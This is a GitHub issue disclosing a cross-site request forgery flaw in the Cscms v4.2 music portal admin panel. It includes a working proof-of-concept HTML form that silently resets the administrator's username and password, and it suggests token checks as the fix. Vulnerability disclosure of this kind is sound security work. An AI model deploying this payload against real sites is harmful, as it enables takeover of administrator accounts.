Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Cross-site request forgery vulnerability exists in Cscms music portal system v4.2 #37

Open
Imbrave99 opened this issue May 12, 2022 · 0 comments

Comments

@Imbrave99
Copy link

Imbrave99 commented May 12, 2022

details
In cscms v4.2 A problem was found in 1

Cross-site request forgery (CSRF) vulnerability in /Cscms_4.2/upload/admin.php/sys/save allow remote attackers to change
administrator's username and password.
Trigger condition: the administrator clicks a malicious link

Cause of vulnerability:
We can find that this script has no anti CSRF mechanism.

Exploit:
Login administrator click URL: http://ip/csrf.html
csrf. html:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.136.136/Cscms_4.2/upload/admin.php/sys/save" method="POST">
      <input type="hidden" name="adminname" value="admin" />
      <input type="hidden" name="adminpass" value="123" />#The password you want to change here is 123
      <input type="hidden" name="sid" value="1" />
      <input type="hidden" name="id" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

/Cscms_4.2/upload/admin.php/sys/save
image

administrator click

image

success

image
The password has been successfully changed to 123
image

Repair method:
Join the random token check

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant